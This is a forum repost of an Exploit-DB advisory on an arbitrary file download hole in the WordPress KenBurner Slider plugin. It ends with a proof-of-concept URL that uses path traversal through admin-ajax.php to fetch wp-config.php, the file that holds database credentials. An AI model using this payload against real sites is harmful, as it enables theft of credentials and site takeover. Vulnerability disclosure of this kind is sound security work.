- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39291
- Проверка EDB
-
- Пройдено
- Автор
- MF0X
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2014-08-24
WordPress Plugin KenBurner Slider - 'admin-ajax.php' Arbitrary File Download
Код:
source: https://www.securityfocus.com/bid/69387/info
The KenBurner Slider plugin for WordPress is prone to an arbitrary file-download vulnerability.
An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php- Источник
- www.exploit-db.com
